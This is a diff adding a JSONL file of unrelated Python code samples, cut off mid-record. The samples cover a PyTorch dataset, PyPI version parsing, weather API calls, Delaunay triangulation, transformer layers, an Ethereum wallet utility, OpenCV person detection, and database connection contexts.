diff --git "a/6360.jsonl" "b/6360.jsonl" new file mode 100644--- /dev/null +++ "b/6360.jsonl" @@ -0,0 +1,683 @@ +{"seq_id":"199273296","text":"\"\"\"\nData: 2021/05/10\nAuthor: worith\nDescription: dataset\n\"\"\"\nimport torch\nimport numpy as np\nimport pandas as pd\nimport torch.utils.data as data\nfrom utils.utils import cut_str\nfrom config.config import global_config\n\n\nclass PDDataset(data.Dataset):\n def __init__(self, split_class, data):\n self.data = data\n\n if split_class == '2':\n self.in_feat = self.data.iloc[:, 0:5].columns.tolist()\n\n self.hidden_feat = self.data.iloc[:, 6:].columns.tolist()\n else:\n self.in_feat = self.data.iloc[:, 0:13].columns.tolist()\n self.hidden_feat = self.data.iloc[:, 14:].columns.tolist()\n\n self.out_feat = ['NPV']\n\n # if normalize:\n\n # self.data = self.data.apply(lambda x: (x - np.mean(x)) / (np.var(x) ))\n\n def __getitem__(self, index):\n x = torch.from_numpy(self.data.iloc[index, :][self.in_feat].values).float()\n\n h = torch.from_numpy(self.data.iloc[index, :][self.hidden_feat].values).float()\n\n y = torch.from_numpy(self.data.iloc[index, :][self.out_feat].values).float()\n\n x = torch.cat((x, h))\n return x, h, y\n\n def __len__(self):\n return self.data.shape[0]\n\n\n\n\n","sub_path":"dataset/fracture_dataset.py","file_name":"fracture_dataset.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"452167219","text":"import json\nimport logging\nimport os\nimport re\n\nimport requests\n\n\nLOG = logging.getLogger(__name__)\nRE_BASENAME = re.compile(r'href=\".+/([^/#]+)\\.(tar\\.gz|whl)#', re.IGNORECASE)\nRE_VERSION = re.compile(r\"^((\\d+)((\\.(\\d+))+)((a|b|c|rc)(\\d+))?(\\.(dev|post)(\\d+))?).*$\")\n\n\nclass PepVersion(object):\n \"\"\"\n Parse versions according to PEP-0440, ordering for non pre-releases is well supported\n Pre-releases are partially supported, no complex combinations (such as .post.dev) are paid attention to\n \"\"\"\n\n components = None\n prerelease = None\n\n def __init__(self, text):\n self.text = text\n m = RE_VERSION.match(text)\n if not m:\n return\n\n self.text, major, main_part, pre, pre_num, rel, rel_num = m.group(1, 2, 3, 7, 8, 10, 11)\n components = (major + main_part).split(\".\")\n if len(components) > 3:\n return # Invalid version\n\n while len(components) < 3:\n components.append(0)\n\n components.append(rel_num if rel == \"post\" else 0) # Using imaginary 4th component to hold post-release\n self.components = tuple(map(int, components))\n if pre:\n self.prerelease = (\"c\" if pre == \"rc\" else pre, int(pre_num))\n\n if rel == \"dev\":\n self.prerelease = (\"dev\", int(rel_num))\n\n def __repr__(self):\n return self.text\n\n def __hash__(self):\n return hash(self.text)\n\n def __eq__(self, other):\n return isinstance(other, PepVersion) and self.components == other.components and self.prerelease == other.prerelease\n\n def __lt__(self, other):\n if isinstance(other, PepVersion):\n if self.components == other.components:\n if self.prerelease:\n return other.prerelease and self.prerelease < other.prerelease\n\n return bool(other.prerelease)\n\n return self.components < other.components\n\n\ndef request_get(url):\n try:\n r = requests.get(url, timeout=30)\n return r.text if r.status_code != 404 else \"does not exist\"\n\n except IOError:\n return None\n\n\nclass PypiInfo(object):\n\n latest = None # type: str\n\n def __init__(self, index, pspec, include_prereleases=False):\n \"\"\"\n Args:\n index (str | None): URL to pypi index to use (default: pypi.org)\n pspec (pickley.PackageSpec): Pypi package name to lookup\n include_prereleases (bool): If True, include latest pre-release\n \"\"\"\n self.index = index or pspec.cfg.default_index\n self.pspec = pspec\n self.problem = None\n if \"{name}\" in self.index:\n self.url = self.index.format(name=self.pspec.dashed)\n\n else:\n # Assume legacy only for now for custom pypi indices\n self.url = \"%s/\" % os.path.join(self.index, self.pspec.dashed)\n\n data = request_get(self.url)\n if not data:\n self.problem = \"no data for %s, check your connection\" % self.url\n return\n\n if data[0] == \"{\": # See https://warehouse.pypa.io/api-reference/json/\n try:\n data = json.loads(data)\n self.latest = data.get(\"info\", {}).get(\"version\")\n\n except Exception as e:\n LOG.warning(\"Failed to parse pypi json from %s: %s\\n%s\", self.url, e, data)\n self.problem = \"invalid json received from %s\" % self.index\n\n return\n\n # Parse legacy pypi HTML\n lines = data.strip().splitlines()\n if not lines or \"does not exist\" in lines[0]:\n self.problem = \"does not exist on %s\" % self.index\n return\n\n releases = set()\n prereleases = set()\n for line in lines:\n m = RE_BASENAME.search(line)\n if m:\n version = PepVersion(self.version_part(m.group(1)))\n if version.components:\n if version.prerelease:\n prereleases.add(version)\n\n else:\n releases.add(version)\n\n if include_prereleases or not releases:\n releases = releases | prereleases\n\n if releases:\n releases = sorted(releases)\n self.latest = releases[-1].text\n return\n\n self.problem = \"no versions published on %s\" % self.index\n\n def __repr__(self):\n return \"%s %s\" % (self.pspec, self.latest)\n\n def _version_part(self, filename):\n if filename:\n filename = filename.lower()\n n = len(self.pspec.wheelified) + 1\n if filename.startswith(\"%s-\" % self.pspec.wheelified.lower()):\n return filename[n:]\n\n n = len(self.pspec.dashed) + 1\n if filename.startswith(\"%s-\" % self.pspec.dashed):\n return filename[n:]\n\n n = len(self.pspec.original) + 1\n if filename.startswith(\"%s-\" % self.pspec.original.lower()):\n return filename[n:]\n\n def version_part(self, filename):\n \"\"\"\n Args:\n filename (str): Filename to examine\n\n Returns:\n (str | None): Version extracted from `filename`, if applicable to current package spec\n \"\"\"\n vp = self._version_part(filename)\n if vp and vp[0].isdigit():\n return vp\n","sub_path":"src/pickley/pypi.py","file_name":"pypi.py","file_ext":"py","file_size_in_byte":5315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"179947398","text":"# importing external libraries\nfrom datetime import datetime\nimport os\nimport pytz\nimport requests\nimport math\n\n\n# api urls as variables\nAPI_URL = ('http://api.openweathermap.org/data/2.5/weather?q={}&appid={}')\nAREA_URL = (\n 'http://api.openweathermap.org/data/2.5/box/city?bbox={},{},{},{},{}&appid={}')\n\n\n# function to get api data by city\ndef query_api(key, city):\n try:\n print(API_URL.format(city, key))\n data = requests.get(API_URL.format(city, key)).json()\n except Exception as exc:\n print(exc)\n data = None\n return data\n\n\n# function to get api data by area\ndef query_api_area(key, lol, lab, lor, lat, z):\n try:\n print(AREA_URL.format(lol, lab, lor, lat, z, key))\n data = requests.get(AREA_URL.format(\n lol, lab, lor, lat, z, key)).json()\n except Exception as exc:\n print(exc)\n data = None\n return data\n","sub_path":"main_api.py","file_name":"main_api.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"118286903","text":"# -*- coding: UTF-8 -*-\n\ndef det(A):\n n = len(A)\n AM = A[:]\n\n for fd in range(n):\n if AM[fd][fd] == 0:\n AM[fd][fd] = 1.0e-18\n for i in range(fd+1, n):\n crScaler = AM[i][fd] / AM[fd][fd]\n for j in range(n):\n AM[i][j] = AM[i][j] - crScaler * AM[fd][j]\n\n product = 1.0\n for i in range(n):\n product *= AM[i][i]\n\n return product\n\ndef get_circle(a, b, c):\n vec = [a[0]**2 + a[1]**2, b[0]**2 + b[1]**2, c[0]**2 + c[1]**2]\n x_mat = [vec, [a[1], b[1], c[1]], [1]*3]\n y_mat = [vec, [a[0], b[0], c[0]], [1]*3]\n d_mat = [[a[0], b[0], c[0]], [a[1], b[1], c[1]], [1] * 3]\n d = 2 * det(d_mat)\n x = 1 / d * det(x_mat)\n y = -1 / d * det(y_mat)\n center = [x, y]\n r = norm([center[0]-a[0], center[1]-a[1]])\n return center, r\n\ndef get_circle_coords(center, r):\n circle = [[r, 180* phi/3.14159265] for phi in range(0, 180, 5)]\n circle = [pol2cart(p[0], p[1]) + (center[0], center[1]) for p in circle]\n return circle\n\ndef orientIfSure(px, py, rx, ry, qx, qy):\n l = (ry - py) * (qx - px)\n r = (rx - px) * (qy - py)\n if (abs(l - r) >= 3.3306690738754716*10**(-16) * abs(l + r)):\n return l - r\n else:\n return 0\n\ndef orient(rx, ry, qx, qy, px, py):\n return (orientIfSure(px, py, rx, ry, qx, qy) or orientIfSure(rx, ry, qx, qy, px, py) or orientIfSure(qx, qy, px, py, rx, ry)) < 0\n\ndef same_side(edge, p1, p2):\n x1, y1 = edge[0][0], edge[0][1]\n x2, y2 = edge[1][0], edge[1][1]\n ax, ay = p1[0], p1[1]\n bx, by = p2[0], p2[1]\n return orient(x1,y1, x2, y2, ax, ay) == orient(x1,y1, x2, y2, bx, by)\n\ndef get_distance(edge, center, r, candidate):\n p1, p2, p0 = edge[0], edge[1], center\n edge_len = norm([p2[0] - p1[0], p2[1] - p1[1]])\n sq = abs((p2[1]-p1[1])*p0[0] - (p2[0]-p1[0])*p0[1] + p2[0]*p1[1] - p2[1]*p1[0])\n dist = sq / edge_len\n if same_side(edge, center, candidate):\n return r + dist\n else:\n return r - dist\n\ndef point_in_arr(arr, point):\n for i in range(len(arr)):\n if arr[i][0] == point[0] and arr[i][1] == point[1]:\n return i\n return -1\n\ndef get_third_point(edge, triangles):\n for triangle in triangles:\n i1, i2 = point_in_arr(triangle, edge[0]), point_in_arr(triangle, edge[1])\n if not (i1 == -1 or i2 == -1):\n for i in range(len(triangle)):\n if not (i1 == i or i2 == i):\n return triangle[i]\n return None\n\ndef get_mate(edge, points, triangles):\n best_point, best_dist = None, None\n third = get_third_point(edge, triangles)\n for point in points:\n if point_in_arr(edge, point) > -1:\n continue\n if third is not None and same_side(edge, point, third):\n continue\n center, r = get_circle(edge[0], edge[1], point)\n dist = get_distance(edge, center, r, point)\n if best_point is None or dist < best_dist:\n best_point, best_dist = point, dist\n return best_point\n\ndef edge_in_frontier(frontier, edge):\n if len(frontier) == 0:\n return None\n for frontier_edge in frontier:\n if frontier_edge == edge:\n return frontier_edge\n flipped = [frontier_edge[1], frontier_edge[0]]\n if flipped == edge:\n return frontier_edge\n return None\n\ndef remove_edge_from_frontier(frontier, edge):\n for i in range(len(frontier)):\n if frontier[i] == edge:\n frontier.remove(edge)\n break\n return frontier\n\ndef update_frontier(frontier, point, used_edge):\n edge1 = [used_edge[0], point]\n edge2 = [used_edge[1], point]\n used_edge = edge_in_frontier(frontier, used_edge)\n fr_edge1 = edge_in_frontier(frontier, edge1)\n fr_edge2 = edge_in_frontier(frontier, edge2)\n if used_edge is not None:\n frontier = remove_edge_from_frontier(frontier, used_edge)\n if fr_edge1 is not None:\n frontier = remove_edge_from_frontier(frontier, fr_edge1)\n else:\n frontier.append(edge1)\n if fr_edge2 is not None:\n frontier = remove_edge_from_frontier(frontier, fr_edge2)\n else:\n frontier.append(edge2)\n return frontier\n\ndef cart2pol(x, y):\n r = sqrt(x**2 + y**2)\n angle = atan2(y, x)\n return(r, angle)\n\ndef norm(vector):\n t = 0\n for i in vector:\n t = t+i*i\n return sqrt(t)\n\ndef hull_edge(points):\n p1 = points[0]\n for point in points:\n if point[1] < p1[1]:\n p1 = point\n p2 = points[0]\n min_angle = 3 * 3.14159265\n for point in points:\n if point == p1: continue\n vector = [point[0]-p1[0], point[1]-p1[1] ]\n angle = cart2pol(vector[0], vector[1])[1]\n if angle < min_angle:\n min_angle, p2 = angle, point\n elif angle == min_angle and norm(vector) > norm(p2 - p1):\n p2 = point\n return [p2, p1]\n\ndef delunay(points):\n triangles = []\n frontier = [hull_edge(points)]\n while frontier:\n edge, frontier = frontier[-1], frontier[:-1]\n mate = get_mate(edge, points, triangles)\n if mate is not None:\n frontier = update_frontier(frontier, mate, edge)\n triangle = [edge[0], edge[1], mate]\n triangles.append(triangle)\n return triangles\n","sub_path":"Pycessing/triangulation/delunayUsingHull.py","file_name":"delunayUsingHull.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"154809791","text":"class SparseArray:\n def __init__(self, array):\n self.array = array\n self.non_zeros = {idx: item for idx, item in enumerate(self.array) if item != 0}\n\n def __len__(self):\n return len(self.array)\n\n def __getitem__(self, idx):\n try:\n return self.array[idx]\n except IndexError:\n print(idx, 'is out of range.')\n except TypeError:\n print(idx, 'is not integers or slices.')\n\n def __setitem__(self, idx, value):\n try:\n self.array[idx] = value\n except IndexError as err:\n print(err)\n except TypeError as err:\n print(err)\n\n def append(self, value):\n if isinstance(value, int):\n self.array.append(value)\n self.non_zeros = {idx: item for idx, item in enumerate(self.array) if item != 0}\n\n def __delitem__(self, idx):\n try:\n del self.array[idx]\n except TypeError as err:\n print(err)\n\n\nif __name__ == '__main__':\n sa = SparseArray([1,2,0,0,0,0,3,0,0,4])\n print('there are', len(sa), 'items')\n print('\\nindexing:',sa[6], '\\n')\n print(sa.array, '\\n')\n print('slicing:', sa[1:9])\n print(sa[34])","sub_path":"students/tri_nguyen/lesson08/SparseArray_class.py","file_name":"SparseArray_class.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256735104","text":"import fileinput\nN = None\ncount = 0\nfor line in fileinput.input():\n if count == 0:\n N = int(line)\n else:\n line = line.strip()\n print(line[0::2] + \" \" + line[1::2])\n count += 1","sub_path":"Day6_review.py","file_name":"Day6_review.py","file_ext":"py","file_size_in_byte":205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"582377475","text":"class Solution:\n\n def is_possible(self, max_weight):\n\n total_weight = 0\n total_days = 1\n\n for weight in self.weights:\n\n if total_weight + weight > max_weight:\n total_weight = weight\n total_days += 1\n\n else:\n total_weight += weight\n\n return total_days <= self.days\n\n def shipWithinDays(self, weights: List[int], days: int) -> int:\n\n self.weights = weights\n self.days = days\n min_possible_weight = max(weights)\n max_possible_weight = sum(weights)\n\n left = min_possible_weight\n right = max_possible_weight\n\n while left < right:\n\n mid = (left + right) // 2\n\n if self.is_possible(mid):\n right = mid\n\n else:\n left = mid + 1\n\n return left\n","sub_path":"1011_Capacity_To_Ship_Packages_Within_D_Days.py","file_name":"1011_Capacity_To_Ship_Packages_Within_D_Days.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"100043221","text":"import torch\nimport torch.nn as nn\n\nfrom .sublayers import SublayerConnection, LayerNorm\nfrom .utils import clones\n\n\nclass Encoder(nn.Module):\n \"Core encoder is a stack of N layers\"\n def __init__(self, layer, N):\n super(Encoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x: torch.tensor, mask: torch.tensor):\n \"Pass the input (and mask) through each layer in turn.\"\n for layer in self.layers:\n x = layer(x, mask)\n return self.norm(x)\n\n\nclass EncoderLayer(nn.Module):\n \"Encoder is made up of self-attn and feed forward (defined below)\"\n def __init__(self, size, self_attn, feed_forward, dropout):\n super(EncoderLayer, self).__init__()\n self.self_attn = self_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 2)\n self.size = size\n\n def forward(self, x: torch.tensor, mask: torch.tensor):\n \"Follow Figure 1 (left) for connections.\"\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, mask))\n return self.sublayer[1](x, self.feed_forward)\n\n\nclass Decoder(nn.Module):\n \"Generic N layer decoder with masking.\"\n def __init__(self, layer, N):\n super(Decoder, self).__init__()\n self.layers = clones(layer, N)\n self.norm = LayerNorm(layer.size)\n\n def forward(self, x: torch.tensor, memory: torch.tensor, src_mask: torch.tensor, tgt_mask: torch.tensor):\n for layer in self.layers:\n x = layer(x, memory, src_mask, tgt_mask)\n return self.norm(x)\n\n\nclass DecoderLayer(nn.Module):\n \"Decoder is made of self-attn, src-attn, and feed forward (defined below)\"\n def __init__(self, size, self_attn, src_attn, feed_forward, dropout):\n super(DecoderLayer, self).__init__()\n self.size = size\n self.self_attn = self_attn\n self.src_attn = src_attn\n self.feed_forward = feed_forward\n self.sublayer = clones(SublayerConnection(size, dropout), 3)\n\n def forward(self, x: torch.tensor, memory: torch.tensor, src_mask: torch.tensor, tgt_mask: torch.tensor):\n \"Follow Figure 1 (right) for connections.\"\n m = memory\n x = self.sublayer[0](x, lambda x: self.self_attn(x, x, x, tgt_mask))\n x = self.sublayer[1](x, lambda x: self.src_attn(x, m, m, src_mask))\n return self.sublayer[2](x, self.feed_forward)","sub_path":"transformer/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"623222274","text":"from __future__ import division\nfrom config.utils.address import AddressUtil\nfrom web3 import Web3\nfrom config.common.exception import CommonError,Error_Messages\nimport json\nfrom config.common.utils import *\nfrom config.utils.transaction import TransactionUtil\n\nimport time \nclass EthUtil():\n def __init__(self,web3):\n self.web3 = web3\n self.address_util = AddressUtil()\n self.transaction_util = TransactionUtil(self.web3)\n self.decimals = 18\n #获得eth余额\n def getEtherBalance(self,raw_address):\n address = self.address_util.toChecksumAddress(raw_address)\n if not address:\n return None\n balance = to_ether(self.web3.eth.getBalance(address))\n return balance\n \n #新建账户\n def newAccount(self,password):\n # password=\"bc502f8b-7823-49e7-bc5c-6f3d71bb50f9\"\n ##print(\"passwor is {}\".format(password))\n address = self.web3.personal.newAccount(password)\n ##print(\"address is {}\".format(address))\n return address\n\n \n #获取区块高度\n def get_block_height(self):\n return self.web3.eth.blockNumber\n \n #转化成最小单位\n def to_wei(self,raw_amount):\n return Web3.toWei(raw_amount,'ether')\n \n #获得gas price\n def get_gas_price(self):\n return self.web3.eth.gasPrice()\n \n #获得某个交易使用的以太币数量\n def get_transaction_fees(self,transaction_hash):\n is_mined = self.is_mined(transaction_hash)\n if not is_mined:\n return is_mined\n transaction_receipt = self.web3.eth.getTransactionReceipt(transaction_hash) \n gas_used = transaction_receipt['gasUsed']\n transaction = self.web3.eth.getTransaction(transaction_hash)\n gas_price = transaction['gasPrice'] \n fees = to_ether(gas_used*gas_price)\n return fees\n\n #通过交易hash获得交易详情\n def get_transaction_details(self,transaction_hash):\n is_mined = self.is_mined(transaction_hash)\n if not is_mined:\n return is_mined\n raw_transaction = self.web3.eth.getTransaction(transaction_hash)\n # raw_transaction['fees'] = self.get_transaction_fees(transaction_hash)\n tx_dict = dict(raw_transaction)\n tx_json= json.dumps(tx_dict, cls=HexJsonEncoder)\n raw_result = json.loads(tx_json)\n raw_result['fees'] = self.get_transaction_fees(transaction_hash)\n result = json.dumps(raw_result)\n # transaction = Web3. toJson(raw_transaction)\n ##print(\"result is {}\".format(result))\n return str(result)\n \n #判断交易有没被打包\n def is_mined(self,transaction_hash):\n if not is_transaction_hash(transaction_hash):\n return None\n if self.web3.eth.getTransactionReceipt(transaction_hash):\n return True\n else:\n return False\n\n \n \n def transfer_ether(self,raw_address,password,to,raw_amount):\n address = self.address_util.toChecksumAddress(raw_address)\n from_balance = to_wei(self.getEtherBalance(raw_address))\n amount = to_wei(raw_amount)\n if from_balance 0.5:\r\n idx = int(person_detections[0, 0, i, 1])\r\n\r\n if CLASSES[idx] != \"person\":\r\n continue\r\n\r\n person_box = person_detections[0, 0, i, 3:7] * np.array([W, H, W, H])\r\n (startX, startY, endX, endY) = person_box.astype(\"int\")\r\n\r\n cv2.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)\r\n\r\n cv2.imshow(\"Results\", image)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\nmain()\r\n\r\n\r\n\"\"\"\r\n\r\nSequence Wise Steps :\r\n\r\nSTEP 1: python person_detection-video.py\r\n\r\nSTEP 2: python person_tracking.py\r\n\r\nSTEP 3: python social_distancing.py\r\n\r\nSTEP 4: python dwell_time.py\r\n\r\nSTEP 5: python combine.py\r\n\r\n\r\n\"\"\"","sub_path":"python/person_detection-image.py","file_name":"person_detection-image.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"346668152","text":"#!/usr/bin/env python\n# _*_ coding:utf-8 _*_\n\"\"\" 数据库引擎对象和数据库连接的上下文对象 \"\"\"\nimport functools\nimport threading\nimport logging\nimport time\nimport uuid\nfrom _bsddb import DBError\n\nfrom sqlalchemy import create_engine\n\n__author__ = 'Devin -- http://zhangchuzhao.site'\n\n\nclass Dict(dict):\n \"\"\"\n Simple dict but support access as x.y style\n\n >>>d1 = Dict()\n >>>d1['x'] = 100\n >>>d1.x\n 100\n >>>d1.y = 200\n >>>d1.y\n 200\n >>>d2 = Dict(a='1', b='2', c='3')\n >>>d2.c\n '3'\n >>>d2['empty']\n Traceback (most recent call last):\n ...\n AttributeError:'Dict' object has no attribute 'empty'\n >>>d3 = Dict(('a', 'b', 'c'), (1, 2, 3))\n >>>d3.a\n 1\n >>>d3.b\n 2\n >>>d3.c\n 3\n \"\"\"\n def __init__(self, names=(), values=(), **kw):\n super(Dict, self).__init__(**kw)\n for k, v in zip(names, values): # list[(tuple)...]\n self[k] = v # 初始化就可以调用自身属性\n\n def __getattr__(self, item):\n try:\n return self[item]\n except KeyError:\n raise AttributeError(r\"'Dict' object has no attribute '%s'\" % item)\n\n def __setattr__(self, key, value):\n self[key] = value\n\n\ndef next_id(t=None):\n \"\"\"\n Return next id as 50-char string.\n Args:\n t: unix timestamp, default to None and using time.time()\n \"\"\"\n if t is None:\n t = time.time()\n return '%015d%s000' % (int(t * 1000), uuid.uuid4().hex)\n\n\n# 运行性能日志\ndef _profiling(start, sql=''):\n t = time.time() - start\n if t > 0.1:\n logging.warning('[PROFILING] [DB] %s %s' % (t, sql))\n else:\n logging.info('[PROFILING] [DB] %s %s' % (t, sql))\n\n\n# 数据库引擎对象\nclass _Engine(object):\n def __init__(self, connect):\n self._connect = connect\n\n def connect(self):\n return self._connect()\n\nengine = None\n\n\n# 数据库连接对象\nclass _LasyConnection(object):\n def __init__(self):\n self.connection = None\n\n def cursor(self):\n if self.connection is None:\n connection = engine.connect()\n logging.info('open connection <%s>...' % hex(id(connection)))\n self.connection = connection\n return self.connection.cursor()\n\n def commit(self):\n self.connection.commit()\n\n def rollback(self):\n self.connection.rollback()\n\n def cleanup(self):\n if self.connection:\n connection = self.connection\n self.connection = None\n logging.info('close connection <%s>...' % hex(id(connection)))\n\n\n# 持有数据库连接的上下文\nclass _DbCtx(threading.local):\n def __init__(self):\n self.connection = None\n self.transactions = 0\n\n def is_init(self):\n return not self.connection is None\n\n def init(self):\n self.connection = _LasyConnection()\n self.transactions = 0\n\n def cleanup(self):\n self.connection.cleanup()\n self.connection = None\n\n def cursor(self):\n return self.connection.cursor()\n\n_db_ctx = _DbCtx()\n\n\n# 实现数据连接的上下文,目的是自动获取和释放连接\nclass _ConnectionCtx(object):\n def __enter__(self):\n global _db_ctx\n self.should_cleanup = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_cleanup = True\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n if self.should_cleanup:\n _db_ctx.cleanup()\n\n\ndef connection():\n \"\"\"\n :return: _ConnectionCtx object that can be used by 'with' statement:\n with connection():\n pass\n \"\"\"\n return _ConnectionCtx()\n\n\ndef with_connection(func):\n \"\"\"\n Decorator for reuse connection\n\n @with_connection\n def foo(*args, **kw):\n f1()\n f2()\n f3()\n \"\"\"\n @functools.wraps(func)\n def _wrapper(*args, **kw):\n with _ConnectionCtx():\n return func(args, kw)\n return _wrapper\n\n\nclass _TransactionCtx(object):\n \"\"\"\n _TransactionCtx object that can handle transactions.\n\n with _TransactionCtx():\n pass\n \"\"\"\n def __enter__(self):\n global _db_ctx\n self.should_close_conn = False\n if not _db_ctx.is_init():\n _db_ctx.init()\n self.should_close_conn = True\n _db_ctx.transactions += 1\n logging.info('begin transaction...' if _db_ctx.transactions == 1 else 'join current transactions')\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _db_ctx\n _db_ctx.transactions -= 1\n try:\n if _db_ctx.transactions == 0:\n if exc_type is None:\n self.commit()\n else:\n self.rollback()\n finally:\n if self.should_close_conn:\n _db_ctx.cleanup()\n\n def commit(self):\n global _db_ctx\n logging.info('commit transaction...')\n try:\n _db_ctx.connection.commit()\n logging.info('commit ok...')\n except:\n logging.warning('commit failed. try rollback...')\n _db_ctx.connection.rollback()\n logging.warning('rollback ok...')\n raise\n\n def rollback(self):\n global _db_ctx\n logging.warning('rollback transaction...')\n _db_ctx.connection.rollbak()\n logging.info('rollback ok...')\n\n\ndef transaction():\n \"\"\"\n create a transaction object so can use with statement:\n with transacton():\n pass\n \"\"\"\n return _TransactionCtx()\n\n\ndef with_transaction(func):\n \"\"\"\n A decorator that makes function around transaction\n \"\"\"\n @functools.wraps(func)\n def _wrapper(*args, **kw):\n _start = time.time()\n with _TransactionCtx():\n return func(args, kw)\n _profiling(_start) # with语句return后,还可以执行语句\n return _wrapper\n\n\ndef _select(sql, first, *args):\n \"\"\"\n Execute select SQL and return unique result or list results\n :param sql: SQL查询语句\n :param first: 是否只返回一个结果\n :param args: 查询参数\n :return: 查询结果\n \"\"\"\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARGS: %s' % (sql, args))\n try:\n cursor = _db_ctx.connection.cursor()\n cursor.execute(sql, args)\n if cursor.description:\n names = [x[0] for x in cursor.description]\n if first:\n values = cursor.fetchone()\n if not values:\n return None\n return Dict(names, values)\n return [Dict(names, x) for x in cursor.fetchall()]\n finally:\n if cursor:\n cursor.close()\n\n\n@with_connection\ndef select(sql, *args):\n \"\"\"\n Execute select SQL and return list or empty list if no result\n :param sql: SQL查询语句\n :param args: 查询参数\n :return: 结果list\n \"\"\"\n return _select(sql, False, *args)\n\n\n@with_connection\ndef select_one(sql, *args):\n \"\"\"\n Execute select SQL and expected one result\n if no result found, return None.\n If multiple results found, the first one returned.\n :param sql: SQL查询语句\n :param args: 查询参数\n :return: 返回一条结果\n \"\"\"\n return _select(sql, True, *args)\n\n\nclass MultiColumnsError(DBError):\n \"\"\"\n 自定义异常类\n \"\"\"\n pass\n\n\n@with_connection\ndef select_int(sql, *args):\n \"\"\"\n Execute select SQL and expected one int column result\n :param sql:\n :param args:\n :return:\n \"\"\"\n _d = _select(sql, True, *args)\n if len(_d) != 1:\n raise MultiColumnsError('Expect only one column.')\n return _d.values()[0]\n\n\n@with_connection\ndef _update(sql, *args):\n global _db_ctx\n cursor = None\n sql = sql.replace('?', '%s')\n logging.info('SQL: %s, ARGS: %s' % (sql, args))\n try:\n cursor = _db_ctx.connection.cursor()\n cursor.execute(sql, args)\n r = cursor.rowcount\n if _db_ctx.transactions == 0:\n logging.info('auto commit')\n _db_ctx.connection.commit()\n return r\n finally:\n if cursor:\n cursor.close()\n\n\ndef update(sql, *args):\n \"\"\"\n Execute update SQL\n :param sql: 更新SQL语句\n :param args: 更新参数\n :return: 影响行数\n \"\"\"\n return _update(sql, *args)\n\n\ndef insert(table, **kwargs):\n \"\"\"\n Execute insert SQL\n :param table: 插入的表\n :param table: 插入的表\n :param kwargs: 插入的数据\n :return: 影响的行数\n \"\"\"\n cols, args = zip(*kwargs.iteritems())\n sql = 'insert into `%s` (%s) values (%s)' % (table, ','.join(['`%s`' % col for col in cols]), ','.join(['?' for i in range(len(cols))]))\n return _update(sql, *args)\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n create_engine('root', 'root', 'test')\n update('drop table if exists user')\n update('create table user (id int primary key, name text, email text, passwd text, last_modified real')\n import doctest\n doctest.testmod()","sub_path":"DevinBlog/www/transwarp/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":9102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"260105921","text":"#!/usr/bin/python\nimport os\nimport shutil\nfrom stat import S_IRUSR, S_IWUSR, S_IXUSR, S_IRGRP, S_IWGRP, S_IXGRP, \\\n S_IROTH, S_IWOTH, S_IXOTH, S_ISGID, ST_MODE\n\nfrom traitlets import Bool\n\nfrom nbgrader.exchange.abc import ExchangeReleaseAssignment as ABCExchangeReleaseAssignment\nfrom nbgrader.exchange.ngshare import Exchange\n\n\nclass ExchangeReleaseAssignment(Exchange, ABCExchangeReleaseAssignment):\n\n force = Bool(False,\n help='Force overwrite existing files in the exchange.'\n ).tag(config=True)\n\n def _load_config(self, cfg, **kwargs):\n if 'ExchangeRelease' in cfg:\n self.log.warning('Use ExchangeReleaseAssignment in config, not ExchangeRelease. Outdated config:\\n%s'\n ,\n '\\n'.join('ExchangeRelease.{key} = {value!r}'.format(key=key,\n value=svalue) for (key, value) in\n cfg.ExchangeRelease.items()))\n\n cfg.ExchangeReleaseAssignment.merge(cfg.ExchangeRelease)\n del cfg.ExchangeRelease\n\n super(ExchangeReleaseAssignment, self)._load_config(cfg, **kwargs)\n\n def ensure_root(self):\n pass\n\n def init_src(self):\n self.src_path = self.coursedir.format_path(self.coursedir.release_directory, '.', self.coursedir.assignment_id)\n\n if not os.path.isdir(self.src_path):\n source = self.coursedir.format_path(self.coursedir.source_directory, '.', self.coursedir.assignment_id)\n if os.path.isdir(source):\n\n # Looks like the instructor forgot to assign\n self.fail(\"Assignment found in '{}' but not '{}', run `nbgrader generate_assignment` first.\".format(source, self.src_path))\n else:\n self._assignment_not_found(self.src_path, self.coursedir.format_path(self.coursedir.release_directory, '.', '*'))\n\n def init_dest(self):\n if self.coursedir.course_id == '':\n self.fail(\"No course id specified. Re-run with --course flag.\")\n self.dest_path = '/assignment/{}/{}'.format(self.coursedir.course_id, self.coursedir.assignment_id)\n\n def assignment_exists(self):\n url = '/assignments/{}'.format(self.coursedir.course_id)\n response = self.ngshare_api_get(url)\n \n if response is 